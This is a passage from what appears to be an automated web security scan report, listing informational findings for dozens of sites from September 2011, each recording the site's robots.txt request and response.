Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:06:33 GMT
ETag: "3516526417"
Expires: Sun, 04 Sep 2011 01:36:33 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...

26.94. http://traffic.outbrain.com/network/redir

Summary

Severity:   Information
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /network/redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 01:24:37 GMT
Connection: close

User-agent: *
Disallow: /


26.95. http://translate.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:24:38 GMT
Expires: Sun, 04 Sep 2011 01:24:38 GMT
Cache-Control: public, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

26.96. http://trc.taboolasyndication.com/reuters/log/2/debug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/log/2/debug

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:48 GMT
Content-Type: text/plain
Content-Length: 65
Last-Modified: Thu, 25 Aug 2011 16:28:27 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

26.97. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tu.connect.wunderloop.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:51 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 23:45:53 GMT
ETag: "1f48785-1a-4df6a131"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.98. http://twitter.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 01:24:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

26.99. http://und.cbscollegestore.com/store.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://und.cbscollegestore.com
Path:   /store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: und.cbscollegestore.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:23 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.100. http://und.cstvauctions.com/auctiondisplay.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://und.cstvauctions.com
Path:   /auctiondisplay.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: und.cstvauctions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:30 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:40:55 GMT
ETag: "26abfe-7b-48a1a9f67b7c0"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.101. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "58d38-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www165
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.102. http://webcache.googleusercontent.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webcache.googleusercontent.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:25:09 GMT
Expires: Sun, 04 Sep 2011 01:25:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.103. http://www.bayareasearchengineacademy.org/blog/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bayareasearchengineacademy.org
Path:   /blog/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bayareasearchengineacademy.org

Response

HTTP/1.1 200 OK
Content-Length: 23
Content-Type: text/plain
Content-Location: http://www.bayareasearchengineacademy.org/robots.txt
Last-Modified: Tue, 11 Nov 2008 19:24:51 GMT
Accept-Ranges: bytes
ETag: "fe12e2b3344c91:245"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:25:11 GMT
Connection: close

User-Agent: *
Allow: /

26.104. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:45:20 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.105. http://www.careerbuilder.com/share/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /share/login.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR38
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.106. http://www.cars.com/go/crp/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/crp/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 19 Jul 2010 20:42:34 GMT
ETag: "9cfb-573-9bb42280"
Accept-Ranges: bytes
Content-Length: 1395
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/plain
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:28 GMT; path=/
Vary: Accept-Encoding, User-Agent

# /robots.txt file for http://www.cars.com

Sitemap: http://www.cars.com/sitemap_index.xml

User-agent: *
Disallow: /cgi-bin
Disallow: /news
Disallow: /privatebeta
Disallow: /searchpreview
Di
...[SNIP]...

26.107. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
ETag: "192f210-89-4c3b85d4"
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
Content-Type: text/plain
Cache-Control: max-age=167
Date: Sun, 04 Sep 2011 01:00:14 GMT
Content-Length: 137
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml

26.108. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.203.35
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.109. http://www.fmglobal.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fmglobal.com
Path:   /default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fmglobal.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 25 May 2011 20:03:29 GMT
Accept-Ranges: bytes
ETag: "f8a54d1161bcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 174
Date: Sun, 04 Sep 2011 01:26:07 GMT
Connection: close

# Show the world
User-agent: *
Disallow: /Login/
Disallow: /Login_files/
Disallow: /js/
Disallow: /code/
Disallow: /documents/
Disallow: /execsum/
Disallow: /redetag/

26.110. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foxsportssouthwest.com

Response

HTTP/1.0 200 OK
Server: nginx/1.0.3
Content-Type: text/plain
Last-Modified: Thu, 14 Jan 2010 23:23:05 GMT
ETag: "12e37cd-e9-47d282b45c840"
Accept-Ranges: bytes
Content-Length: 233
Date: Sun, 04 Sep 2011 01:26:09 GMT
Connection: close

User-agent: MediaPartners-Google
Disallow:

User-agent: Googlebot
Disallow:

User-agent: Googlebot-*
Disallow:

User-agent: Slurp
Disallow:

User-agent: Bing
Disallow:

User-agent: MSNBot
Disal
...[SNIP]...

26.111. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freep.com
Path:   /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freep.com

Response

HTTP/1.0 200 OK
Content-Length: 924
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 17:24:49 GMT
Accept-Ranges: bytes
ETag: "8046922b80acc1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sun, 04 Sep 2011 01:26:11 GMT
Connection: close

# Robots.txt
# Be nice.
#
Sitemap: http://www.freep.com/sitemap_index.xml
Sitemap: http://www.freep.com/sitemapnews_index.xml
#
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallo
...[SNIP]...

26.112. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 00:41:11 GMT
Expires: Sun, 04 Sep 2011 00:41:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.113. http://www.google.com/trends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:21:11 GMT
Expires: Sun, 04 Sep 2011 01:21:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.114. http://www.googleadservices.com/pagead/conversion/1031221371/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1031221371/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 00:42:24 GMT
Expires: Sun, 04 Sep 2011 00:42:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.115. http://www.greenbiz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbiz.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbiz.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:34:11 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 25 May 2011 20:43:55 GMT
ETag: "1e20601-5be-4a41fc35658c0"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 00:34:11 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Age: 3123
X-Cache: HIT from localhost
X-Cache-Lookup: HIT from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...

26.116. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 254
Content-Type: text/plain
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Tue, 28 Jun 2011 20:25:21 GMT
ETag: "fe-4e0a38b1"
Cache-Control: private, max-age=100
Date: Sun, 04 Sep 2011 01:26:16 GMT
Content-Length: 254
Connection: close

User-agent: *
Disallow: /*,email.
Disallow: /search/
Disallow: /about/adops/
Disallow: /about/adops/hp/
Sitemap: http://www.latimes.com/sitemap.xml

User-agent: Googlebot-News
Disallow: /*sns-ap
Disal
...[SNIP]...

26.117. http://www.linkedin.com/countserv/count/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-991542871"
Last-Modified: Wed, 06 Apr 2011 03:23:57 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:45:53 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.118. https://www.linkedin.com/secure/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-781835069"
Last-Modified: Wed, 06 Apr 2011 03:23:38 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 01:26:20 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.119. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: a13891e7efbd29955c3b9025dcf9d11ed5e033d9b20df65c
X-AspNet-Version: 4.0.30319
X-PoweredBy: Adonis DNA
Date: Sun, 04 Sep 2011 01:26:20 GMT
Connection: keep-alive
Content-Length: 660
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...

26.120. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/setRemoteDomainCookies.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcudigitaladops.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 30 Mar 2009 14:13:51 GMT
ETag: "a2698d-23-46656b114e5c0"
Accept-Ranges: bytes
Content-Length: 35
Cache-Control: max-age=300
Expires: Sun, 04 Sep 2011 00:55:25 GMT
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:50:25 GMT
Connection: close
Set-Cookie: pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000; expires=Sun, 04-Sep-2011 04:50:25 GMT; path=/

User-agent: *
Disallow: /pixelman/

26.121. http://www.newslibrary.com/nlsearch.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newslibrary.com
Path:   /nlsearch.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newslibrary.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:25 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
Last-Modified: Mon, 08 Dec 2008 15:21:15 GMT
ETag: "9de3-6c-493d3b6b"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /

Crawl-delay: 5

Disallow: /cgi-bin/

26.122. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:13 GMT
Content-Length: 213
Age: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
Disallow: /beta
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl

...[SNIP]...

26.123. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=371
Date: Sun, 04 Sep 2011 00:57:45 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

26.124. http://www.sologig.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sologig.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sologig.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL47
Date: Sun, 04 Sep 2011 01:27:39 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.125. http://www.sprint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:31 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Tue, 29 Jun 2010 17:26:58 GMT
ETag: "4f0535-7f-48a2e8b5b7c80"
Accept-Ranges: bytes
Content-Length: 127
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html

26.126. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.net

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:52 GMT
Server: Apache/2.2.4 (Unix)
Last-Modified: Tue, 11 Dec 2007 15:43:44 GMT
ETag: "bc18-1d-93e86c00"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ip/

26.127. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:11 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Sun, 04 Sep 2011 01:27:59 GMT
Age: 58
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.128. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thatsracin.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 23 May 2011 20:15:25 GMT
ETag: "1f1e016-7b-4ddac05d"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=552
Date: Sun, 04 Sep 2011 01:28:02 GMT
Content-Length: 123
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.thatsracin.com/sitemap.xml
Sitemap: http://www.thatsracin.com/news_sitemap.xml

26.129. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traffic.com
Path:   /Charlotte-Traffic/Charlotte-Traffic-Map.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Content-Language: en-US
Content-Length: 25
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1

User-agent: *
Disallow:

26.130. http://www.tsn.ca/ncaa/story/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tsn.ca
Path:   /ncaa/story/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tsn.ca

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/plain
Last-Modified: Mon, 29 Jun 2009 16:47:28 GMT
Accept-Ranges: bytes
ETag: "e6816c49d9f8c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:28 GMT
Connection: close
Content-Length: 27

User-Agent: *
Allow: /


26.131. http://www.tulsaworld.com/site/articlepath.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tulsaworld.com
Path:   /site/articlepath.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 87
Content-Type: text/plain
Last-Modified: Wed, 20 Apr 2011 20:43:15 GMT
Accept-Ranges: bytes
ETag: "3f6863929bffcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

#
# /robots.txt
#

User-agent: *
Disallow: /images
Disallow: /articleimages

